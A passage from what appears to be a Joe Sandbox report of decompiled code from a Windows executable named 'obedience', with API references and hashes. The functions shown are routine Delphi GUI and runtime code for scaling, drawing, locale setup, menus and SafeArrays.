      				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
      					_t107 =  *0x4446e8; // 0x1f
      				} else {
      					_t107 =  *((intOrPtr*)(__eax + 0x98));
      				}
      				if((_t107 & 0x00000001) == 0) {
      					_t119 =  *(_t118 + 0x40);
      				} else {
      					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
      				}
      				if((_t107 & 0x00000002) == 0) {
      					_t121[1] =  *(_t118 + 0x44);
      				} else {
      					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
      				}
      				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
      					_t64 =  *(_t118 + 0x48);
      					_t121[2] = _t64;
      				} else {
      					if((_t107 & 0x00000001) == 0) {
      						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
      						_t121[2] = _t64;
      					} else {
      						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
      						_t121[2] = _t64;
      					}
      				}
      				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
      				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
      					_t121[3] =  *(_t118 + 0x4c);
      				} else {
      					if(_t65 == 0) {
      						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
      					} else {
      						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
      					}
      				}
      				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
      				_t113 =  *0x4446f0; // 0x0
      				if(_t113 != (_t107 &  *0x4446ec)) {
      					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
      				}
      				_t114 =  *0x4446f0; // 0x0
      				if(_t114 != (_t107 &  *0x4446f4)) {
      					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
      				}
      				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
      					E00425DCC( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E00425DB0( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
      				}
      				goto L29;
			}

      Address column (one entry per decompiled statement, in decompilation order; the side-by-side alignment of the original layout is not preserved): 0x0044454b, 0x0044454e, 0x00444550, 0x00444555, 0x004446d2, 0x004446d2, 0x004446d7, 0x004446e4, 0x004446e4, 0x0044455f, 0x00444569, 0x00444561, 0x00444561, 0x00444561, 0x00444572, 0x00444586, 0x00444574, 0x00444582, 0x00444582, 0x0044458c, 0x004445a5, 0x0044458e, 0x0044459c, 0x0044459c, 0x004445ac, 0x004445e6, 0x004445e9, 0x004445b4, 0x004445b7, 0x004445db, 0x004445e0, 0x004445b9, 0x004445ca, 0x004445cc, 0x004445cc, 0x004445b7, 0x004445f0, 0x004445f5, 0x00444639, 0x004445fd, 0x00444605, 0x00444630, 0x00444607, 0x0044461c, 0x0044461c, 0x00444605, 0x00444651, 0x0044465f, 0x00444667, 0x0044467a, 0x0044467a, 0x00444688, 0x00444690, 0x004446a3, 0x004446a3, 0x004446ad, 0x004446cd, 0x004446cd, 0x00000000

      APIs
      • MulDiv.KERNEL32(?,?,?), ref: 0044457D
      • MulDiv.KERNEL32(?,?,?), ref: 00444597
      • MulDiv.KERNEL32(?,?,?), ref: 004445C5
      • MulDiv.KERNEL32(?,?,?), ref: 004445DB
      • MulDiv.KERNEL32(?,?,?), ref: 00444613
      • MulDiv.KERNEL32(?,?,?), ref: 0044462B
      • MulDiv.KERNEL32(?,?,0000001F), ref: 00444675
      • MulDiv.KERNEL32(?,?,0000001F), ref: 0044469E
      • MulDiv.KERNEL32(00000000,?,0000001F), ref: 004446C4
        • Part of subcall function 00425DCC: MulDiv.KERNEL32(00000000,?,00000048), ref: 00425DD9
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: a369b7d4af042cbc11d91c21c57002bb756c2415325cb00f98c73500d544247a
      • Instruction ID: 53bfc22628fe924410b9341a070d667e14512c41555d7ee83f6bc035f422ebbb
      • Opcode Fuzzy Hash: a369b7d4af042cbc11d91c21c57002bb756c2415325cb00f98c73500d544247a
      • Instruction Fuzzy Hash: 6E511D70608741AFE721DB69C845B6BB7E9AF86304F04481EBAD5C7392C63DE844CB25
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 37%
      			E004453F0(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
      				char _v5;
      				struct HDC__* _v12;
      				struct HDC__* _v16;
      				void* _v20;
      				intOrPtr _v24;
      				intOrPtr _v28;
      				int _v32;
      				int _v36;
      				struct HDC__* _t33;
      				intOrPtr _t72;
      				int _t74;
      				intOrPtr _t80;
      				int _t83;
      				void* _t88;
      				int _t89;
      				void* _t92;
      				void* _t93;
      				intOrPtr _t94;
      
      				_t92 = _t93;
      				_t94 = _t93 + 0xffffffe0;
      				_v5 = __ecx;
      				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
      				if(_v5 == 0) {
      					_push(__edx);
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					_pop(_t88);
      				} else {
      					_push(__edx);
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					_pop(_t88);
      				}
      				_v12 = GetDesktopWindow();
      				_push(0x402);
      				_push(0);
      				_t33 = _v12;
      				_push(_t33);
      				L00407660();
      				_v16 = _t33;
      				_push(_t92);
      				_push(0x44550b);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t94;
      				_v20 = SelectObject(_v16, E0042632C( *((intOrPtr*)(_t88 + 0x40))));
      				_t89 = _v36;
      				_t83 = _v32;
      				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
      				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
      				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
      				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
      				SelectObject(_v16, _v20);
      				_pop(_t80);
      				 *[fs:eax] = _t80;
      				_push(0x445512);
      				_push(_v16);
      				_t72 = _v12;
      				_push(_t72);
      				L004078C0();
      				return _t72;
			}

      Address column (one entry per decompiled statement, in decompilation order; the side-by-side alignment of the original layout is not preserved): 0x004453f1, 0x004453f3, 0x004453f9, 0x00445405, 0x0044540b, 0x0044541b, 0x00445422, 0x00445423, 0x00445424, 0x00445425, 0x00445426, 0x0044540d, 0x0044540d, 0x00445414, 0x00445415, 0x00445416, 0x00445417, 0x00445418, 0x00445418, 0x0044542c, 0x0044542f, 0x00445434, 0x00445436, 0x00445439, 0x0044543a, 0x0044543f, 0x00445444, 0x00445445, 0x0044544a, 0x0044544d, 0x00445462, 0x0044546e, 0x00445476, 0x00445483, 0x004454a5, 0x004454c4, 0x004454de, 0x004454eb, 0x004454f2, 0x004454f5, 0x004454f8, 0x00445500, 0x00445501, 0x00445504, 0x00445505, 0x0044550a

      APIs
      • GetDesktopWindow.USER32 ref: 00445427
      • 73BEACE0.USER32(?,00000000,00000402), ref: 0044543A (import not resolved by the plugin; it is called with the desktop HWND, a NULL region and flags 0x402 = DCX_CACHE | DCX_LOCKWINDOWUPDATE, and its return value is used as the HDC for SelectObject/PatBlt, which is consistent with GetDCEx)
      • SelectObject.GDI32(?,00000000), ref: 0044545D
      • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 00445483
      • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 004454A5
      • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 004454C4
      • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 004454DE
      • SelectObject.GDI32(?,?), ref: 004454EB
      • 73BEB380.USER32(?,?,00445512,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?), ref: 00445505 (import not resolved by the plugin; it receives the same desktop HWND and the HDC obtained above, which is consistent with ReleaseDC)
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ObjectSelect$B380DesktopWindow
      • String ID:
      • API String ID: 989747725-0
      • Opcode ID: 5ee985242bb9f1b2984d71d21acc70f8da3ac16fb6056f9344197e33d3ab406f
      • Instruction ID: 4076bfeecb81f29f362ff675aa21a8d639f731f852e736a6dcacc3e06134783b
      • Opcode Fuzzy Hash: 5ee985242bb9f1b2984d71d21acc70f8da3ac16fb6056f9344197e33d3ab406f
      • Instruction Fuzzy Hash: A0310A72E04619AFDB00DEEDDC89DAFBBBCEF09704B404465B904F7241C679AD048B64
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 72%
      			E0040DD64(void* __ebx, void* __edx, void* __edi, void* __esi) {
      				char _v8;
      				char _v12;
      				char _v16;
      				char _v20;
      				char _v24;
      				char _v28;
      				char _v32;
      				char _v36;
      				char _v40;
      				char _v44;
      				char _v48;
      				char _v52;
      				char _v56;
      				char _v60;
      				char _v64;
      				char _v68;
      				void* _t104;
      				void* _t111;
      				void* _t133;
      				intOrPtr _t183;
      				intOrPtr _t193;
      				intOrPtr _t194;
      
      				_t191 = __esi;
      				_t190 = __edi;
      				_t193 = _t194;
      				_t133 = 8;
      				do {
      					_push(0);
      					_push(0);
      					_t133 = _t133 - 1;
      				} while (_t133 != 0);
      				_push(__ebx);
      				_push(_t193);
      				_push(0x40e02f);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t194;
      				E0040DBEC();
      				E0040C4D0(__ebx, __edi, __esi);
      				_t196 =  *0x49074c;
      				if( *0x49074c != 0) {
      					E0040C6A8(__esi, _t196);
      				}
      				_t132 = GetThreadLocale();
      				E0040C420(_t43, 0, 0x14,  &_v20);
      				E00404A94(0x490680, _v20);
      				E0040C420(_t43, 0x40e044, 0x1b,  &_v24);
      				 *0x490684 = E0040938C(0x40e044, 0, _t196);
      				E0040C420(_t132, 0x40e044, 0x1c,  &_v28);
      				 *0x490685 = E0040938C(0x40e044, 0, _t196);
      				 *0x490686 = E0040C46C(_t132, 0x2c, 0xf);
      				 *0x490687 = E0040C46C(_t132, 0x2e, 0xe);
      				E0040C420(_t132, 0x40e044, 0x19,  &_v32);
      				 *0x490688 = E0040938C(0x40e044, 0, _t196);
      				 *0x490689 = E0040C46C(_t132, 0x2f, 0x1d);
      				E0040C420(_t132, "m/d/yy", 0x1f,  &_v40);
      				E0040C758(_v40, _t132,  &_v36, _t190, _t191, _t196);
      				E00404A94(0x49068c, _v36);
      				E0040C420(_t132, "mmmm d, yyyy", 0x20,  &_v48);
      				E0040C758(_v48, _t132,  &_v44, _t190, _t191, _t196);
      				E00404A94(0x490690, _v44);
      				 *0x490694 = E0040C46C(_t132, 0x3a, 0x1e);
      				E0040C420(_t132, 0x40e078, 0x28,  &_v52);
      				E00404A94(0x490698, _v52);
      				E0040C420(_t132, 0x40e084, 0x29,  &_v56);
      				E00404A94(0x49069c, _v56);
      				E00404A40( &_v12);
      				E00404A40( &_v16);
      				E0040C420(_t132, 0x40e044, 0x25,  &_v60);
      				_t104 = E0040938C(0x40e044, 0, _t196);
      				_t197 = _t104;
      				if(_t104 != 0) {
      					E00404AD8( &_v8, 0x40e09c);
      				} else {
      					E00404AD8( &_v8, 0x40e090);
      				}
      				E0040C420(_t132, 0x40e044, 0x23,  &_v64);
      				_t111 = E0040938C(0x40e044, 0, _t197);
      				_t198 = _t111;
      				if(_t111 == 0) {
      					E0040C420(_t132, 0x40e044, 0x1005,  &_v68);
      					if(E0040938C(0x40e044, 0, _t198) != 0) {
      						E00404AD8( &_v12, 0x40e0b8);
      					} else {
      						E00404AD8( &_v16, 0x40e0a8);
      					}
      				}
      				_push(_v12);
      				_push(_v8);
      				_push(":mm");
      				_push(_v16);
      				E00404DC0();
      				_push(_v12);
      				_push(_v8);
      				_push(":mm:ss");
      				_push(_v16);
      				E00404DC0();
      				 *0x49074e = E0040C46C(_t132, 0x2c, 0xc);
      				_pop(_t183);
      				 *[fs:eax] = _t183;
      				_push(E0040E036);
      				return E00404A64( &_v68, 0x10);
			}

      Address column (one entry per decompiled statement, in decompilation order; the side-by-side alignment of the original layout is not preserved): 0x0040dd64, 0x0040dd64, 0x0040dd65, 0x0040dd67, 0x0040dd6c, 0x0040dd6c, 0x0040dd6e, 0x0040dd70, 0x0040dd70, 0x0040dd73, 0x0040dd76, 0x0040dd77, 0x0040dd7c, 0x0040dd7f, 0x0040dd82, 0x0040dd87, 0x0040dd8c, 0x0040dd93, 0x0040dd95, 0x0040dd95, 0x0040dd9f, 0x0040ddae, 0x0040ddbb, 0x0040ddd0, 0x0040dddf, 0x0040ddf4, 0x0040de03, 0x0040de16, 0x0040de29, 0x0040de3e, 0x0040de4d, 0x0040de60, 0x0040de75, 0x0040de80, 0x0040de8d, 0x0040dea2, 0x0040dead, 0x0040deba, 0x0040decd, 0x0040dee2, 0x0040deef, 0x0040df04, 0x0040df11, 0x0040df19, 0x0040df21, 0x0040df36, 0x0040df40, 0x0040df45, 0x0040df47, 0x0040df60, 0x0040df49, 0x0040df51, 0x0040df51, 0x0040df75, 0x0040df7f, 0x0040df84, 0x0040df86, 0x0040df98, 0x0040dfa9, 0x0040dfc2, 0x0040dfab, 0x0040dfb3, 0x0040dfb3, 0x0040dfa9, 0x0040dfc7, 0x0040dfca, 0x0040dfcd, 0x0040dfd2, 0x0040dfdf, 0x0040dfe4, 0x0040dfe7, 0x0040dfea, 0x0040dfef, 0x0040dffc, 0x0040e00f, 0x0040e016, 0x0040e019, 0x0040e01c, 0x0040e02e

      APIs
      • GetThreadLocale.KERNEL32(00000000,0040E02F,?,?,00000000,00000000), ref: 0040DD9A
        • Part of subcall function 0040C420: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C43E
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Locale$InfoThread
      • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
      • API String ID: 4232894706-2493093252
      • Opcode ID: 579f7d9d91358018fffc3f22276be57aed883a1dfb48e9bf89f8310b21094002
      • Instruction ID: 3a5c4ef11a2410a6d7c78f4c3c508f84bd0185972b61034dc139baa5e1d59508
      • Opcode Fuzzy Hash: 579f7d9d91358018fffc3f22276be57aed883a1dfb48e9bf89f8310b21094002
      • Instruction Fuzzy Hash: BD6161707001489BDB10FBA6D89169F76A6AB88304F50943BB601BB3C6CA3DDD198B5D
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 87%
      			E004547EC(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
      				char _v5;
      				char _v12;
      				char _v13;
      				struct tagMENUITEMINFOA _v61;
      				char _v68;
      				intOrPtr _t103;
      				CHAR* _t109;
      				char _t115;
      				short _t149;
      				void* _t154;
      				intOrPtr _t161;
      				intOrPtr _t184;
      				struct HMENU__* _t186;
      				int _t190;
      				void* _t192;
      				intOrPtr _t193;
      				void* _t196;
      				void* _t205;
      
      				_t155 = __ecx;
      				_v68 = 0;
      				_v12 = 0;
      				_v5 = __ecx;
      				_t186 = __edx;
      				_t154 = __eax;
      				_push(_t196);
      				_push(0x454a47);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t196 + 0xffffffc0;
      				if( *((char*)(__eax + 0x3e)) == 0) {
      					L22:
      					_pop(_t161);
      					 *[fs:eax] = _t161;
      					_push(0x454a4e);
      					E00404A40( &_v68);
      					return E00404A40( &_v12);
      				}
      				E00404AD8( &_v12,  *((intOrPtr*)(__eax + 0x30)));
      				if(E004567A8(_t154) <= 0) {
      					__eflags =  *((short*)(_t154 + 0x60));
      					if( *((short*)(_t154 + 0x60)) == 0) {
      						L8:
      						if((GetVersion() & 0x000000ff) < 4) {
      							_t190 =  *(0x48eda8 + ((E00404E4C( *((intOrPtr*)(_t154 + 0x30)), 0x454a6c) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0048ED9C |  *0x0048ED8C |  *0x0048ED94 | 0x00000400;
      							_t103 = E004567A8(_t154);
      							__eflags = _t103;
      							if(_t103 <= 0) {
      								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E00404F00(_v12));
      							} else {
      								_t109 = E00404F00( *((intOrPtr*)(_t154 + 0x30)));
      								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E00454CFC(_t154), _t109);
      							}
      							goto L22;
      						}
      						_v61.cbSize = 0x2c;
      						_v61.fMask = 0x3f;
      						_t192 = E00456D64(_t154);
      						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E00456380(_t154) == 0) {
      							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
      								L14:
      								_t115 = 0;
      								goto L16;
      							}
      							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
      							if(_t205 == 0) {
      								goto L15;
      							}
      							goto L14;
      						} else {
      							L15:
      							_t115 = 1;
      							L16:
      							_v13 = _t115;
      							_v61.fType =  *(0x48eddc + ((E00404E4C( *((intOrPtr*)(_t154 + 0x30)), 0x454a6c) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0048EDD4 |  *0x0048EDB0 |  *0x0048EDE4 |  *0x0048EDEC;
      							_v61.fState =  *0x0048EDBC |  *0x0048EDCC |  *0x0048EDC4;
      							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
      							_v61.hSubMenu = 0;
      							_v61.hbmpChecked = 0;
      							_v61.hbmpUnchecked = 0;
      							_v61.dwTypeData = E00404F00(_v12);
      							if(E004567A8(_t154) > 0) {
      								_v61.hSubMenu = E00454CFC(_t154);
      							}
      							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
      							goto L22;
      						}
      					}
      					_t193 =  *((intOrPtr*)(_t154 + 0x64));
      					__eflags = _t193;
      					if(_t193 == 0) {
      						L7:
      						_push(_v12);
      						_push(0x454a60);
      						E00453E50( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
      						_push(_v68);
      						E00404DC0();
      						goto L8;
      					}
      					__eflags =  *((intOrPtr*)(_t193 + 0x64));
      					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
      						goto L7;
      					}
      					_t184 =  *0x4536e0; // 0x45372c
      					_t149 = E00403D88( *((intOrPtr*)(_t193 + 4)), _t184);
      					__eflags = _t149;
      					if(_t149 != 0) {
      						goto L8;
      					}
      					goto L7;
      				}
      				_v61.hSubMenu = E00454CFC(_t154);
      				goto L8;
      			}

      APIs
      • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 00454998
      • GetVersion.KERNEL32(00000000,00454A47), ref: 00454888
        • Part of subcall function 00454CFC: CreatePopupMenu.USER32(?,00454A03,00000000,00000000,00454A47), ref: 00454D17
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Menu$CreateInsertItemPopupVersion
      • String ID: ,$,7E$?
      • API String ID: 133695497-1365133851
      • Opcode ID: 72218391c00259681a95bd6d5928f9942da8ae401d1e62715851f693d6284658
      • Instruction ID: 442cd844d828040ee7ddf9df9b2df35bccadfead9cb9e6ee97a742b757651eba
      • Opcode Fuzzy Hash: 72218391c00259681a95bd6d5928f9942da8ae401d1e62715851f693d6284658
      • Instruction Fuzzy Hash: EF610234A042419BDB50EF6ADC8169E77F5BF89309B44487AED40EB397D638D889C71C
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 77%
      			E0041058C(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
      				char _v260;
      				char _v768;
      				char _v772;
      				short* _v776;
      				intOrPtr _v780;
      				char _v784;
      				signed int _v788;
      				intOrPtr _v792;
      				signed short* _v796;
      				char _v800;
      				char _v804;
      				intOrPtr* _v808;
      				void* __ebp;
      				signed char _t51;
      				signed int _t58;
      				void* _t66;
      				intOrPtr* _t78;
      				intOrPtr* _t96;
      				void* _t98;
      				void* _t100;
      				void* _t103;
      				void* _t104;
      				intOrPtr* _t114;
      				void* _t118;
      				char* _t119;
      				void* _t120;
      
      				_t105 = __ecx;
      				_v780 = __ecx;
      				_t96 = __edx;
      				_v776 = __eax;
      				if(( *(__edx + 1) & 0x00000020) == 0) {
      					E00410134(0x80070057);
      				}
      				_t51 =  *_t96;
      				if((_t51 & 0x00000fff) != 0xc) {
      					_push(_t96);
      					_push(_v776);
      					L0040EE20();
      					return E00410134(_v776);
      				} else {
      					if((_t51 & 0x00000040) == 0) {
      						_v796 =  *((intOrPtr*)(_t96 + 8));
      					} else {
      						_v796 =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 8))));
      					}
      					_v788 =  *_v796 & 0x0000ffff;
      					_t98 = _v788 - 1;
      					if(_t98 < 0) {
      						L9:
      						_push( &_v772);
      						_t58 = _v788;
      						_push(_t58);
      						_push(0xc);
      						L0040F274();
      						_v792 = _t58;
      						if(_v792 == 0) {
      							E0040FE8C(_t105);
      						}
      						E004104E4(_v776);
      						 *_v776 = 0x200c;
      						 *((intOrPtr*)(_v776 + 8)) = _v792;
      						_t100 = _v788 - 1;
      						if(_t100 < 0) {
      							L14:
      							_t102 = _v788 - 1;
      							if(E00410500(_v788 - 1, _t120) != 0) {
      								L0040F28C();
      								E00410134(_v796);
      								L0040F28C();
      								E00410134(_v792);
      								_v780(_v792,  &_v260,  &_v804, _v796,  &_v260,  &_v800);
      							}
      							_t66 = E00410530(_t102, _t120);
      						} else {
      							_t103 = _t100 + 1;
      							_t78 =  &_v768;
      							_t114 =  &_v260;
      							do {
      								 *_t114 =  *_t78;
      								_t114 = _t114 + 4;
      								_t78 = _t78 + 8;
      								_t103 = _t103 - 1;
      							} while (_t103 != 0);
      							do {
      								goto L14;
      							} while (_t66 != 0);
      							return _t66;
      						}
      					} else {
      						_t104 = _t98 + 1;
      						_t118 = 0;
      						_t119 =  &_v772;
      						do {
      							_v808 = _t119;
      							_push(_v808 + 4);
      							_t18 = _t118 + 1; // 0x1
      							_push(_v796);
      							L0040F27C();
      							E00410134(_v796);
      							_push( &_v784);
      							_t21 = _t118 + 1; // 0x1
      							_push(_v796);
      							L0040F284();
      							E00410134(_v796);
      							 *_v808 = _v784 -  *((intOrPtr*)(_v808 + 4)) + 1;
      							_t118 = _t118 + 1;
      							_t119 = _t119 + 8;
      							_t104 = _t104 - 1;
      						} while (_t104 != 0);
      						goto L9;
      					}
      				}
      			}

      APIs
      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00410625
      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00410641
      • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0041067A
      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410706
      • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00410725
      • VariantCopy.OLEAUT32(?), ref: 0041075A
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ArraySafe$BoundIndex$CopyCreateVariant
      • String ID:
      • API String ID: 351091851-3916222277
      • Opcode ID: 6771deac4e97dd39e9e1e90b55d8794207f0589d90c71d561f206bc82a88abcb
      • Instruction ID: 9dab50e4529243bf869c33cb0647a587d1e4903c392135f18991978b55060660
      • Opcode Fuzzy Hash: 6771deac4e97dd39e9e1e90b55d8794207f0589d90c71d561f206bc82a88abcb
      • Instruction Fuzzy Hash: 4E51E9759012199FCB61EB59C980BD9B3BDAF4D304F4041EAA548E7202DA78AFC5CF68
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 84%
      			E004480E8(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
      				char _v68;
      				struct _WNDCLASSA _v108;
      				intOrPtr _v116;
      				signed char _v137;
      				void* _v144;
      				struct _WNDCLASSA _v184;
      				char _v188;
      				char _v192;
      				char _v196;
      				int _t52;
      				void* _t53;
      				intOrPtr _t86;
      				intOrPtr _t104;
      				intOrPtr _t108;
      				void* _t109;
      				intOrPtr* _t111;
      				void* _t115;
      
      				_t109 = __edi;
      				_t94 = __ebx;
      				_push(__ebx);
      				_v196 = 0;
      				_t111 = __eax;
      				_push(_t115);
      				_push(0x4482a9);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t115 + 0xffffff40;
      				_t95 =  *__eax;
      				 *((intOrPtr*)( *__eax + 0x98))();
      				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
      					L7:
      					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
      					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
      					asm("sbb eax, eax");
      					_t53 = _t52 + 1;
      					if(_t53 == 0 || E00441700 != _v184.lpfnWndProc) {
      						if(_t53 != 0) {
      							UnregisterClassA( &_v68, _v108.hInstance);
      						}
      						_v108.lpfnWndProc = E00441700;
      						_v108.lpszClassName =  &_v68;
      						if(RegisterClassA( &_v108) == 0) {
      							E0040E218(_t94, _t95, _t109, _t111);
      						}
      					}
      					 *0x48ebd8 = _t111;
      					_t96 =  *_t111;
      					 *((intOrPtr*)( *_t111 + 0x9c))();
      					if( *(_t111 + 0x180) == 0) {
      						E0040E218(_t94, _t96, _t109, _t111);
      					}
      					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
      						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
      					}
      					E00409CBC( *((intOrPtr*)(_t111 + 0x64)));
      					 *((intOrPtr*)(_t111 + 0x64)) = 0;
      					E0044B468(_t111);
